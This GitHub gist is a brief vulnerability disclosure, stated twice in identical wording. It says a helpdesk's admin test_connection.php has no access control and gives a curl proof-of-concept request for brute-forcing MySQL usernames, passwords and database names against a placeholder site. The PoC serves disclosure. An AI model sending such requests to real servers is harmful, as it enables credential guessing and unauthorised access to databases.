cedriczirtacic/gist:c32e8e4348b216c8d555

## gistfile1.txt
(*) There isn't an access control in the file test_connection.php, which performs tests for MySQL connections (also POP3 and SMTP). This can give an attacker the opportunity to perform a dictionary bruteforce attack and check every possible combination of username/password and/or databases without having the need to make a real connection to the MySQL service.

(*) proof-of-concept:

curl 'http://www.website.com/admin/test_connection.php' -H 'Host: www.website.com' --data 'test=mysql&s_db_host=localhost&s_db_name=DATABASE&s_db_user=USERNAME&s_db_pass=PASSWORD&s_db_pfix=hesk_' --compressed

Where USERNAME, PASSWORD and DATABASE are parameters to bruteforce.
	(*) There isn't an access control in the file test_connection.php, which performs tests for MySQL connections (also POP3 and SMTP). This can give an attacker the opportunity to perform a dictionary bruteforce attack and check every possible combination of username/password and/or databases without having the need to make a real connection to the MySQL service.

	(*) proof-of-concept:

	curl 'http://www.website.com/admin/test_connection.php' -H 'Host: www.website.com' --data 'test=mysql&s_db_host=localhost&s_db_name=DATABASE&s_db_user=USERNAME&s_db_pass=PASSWORD&s_db_pfix=hesk_' --compressed

	Where USERNAME, PASSWORD and DATABASE are parameters to bruteforce.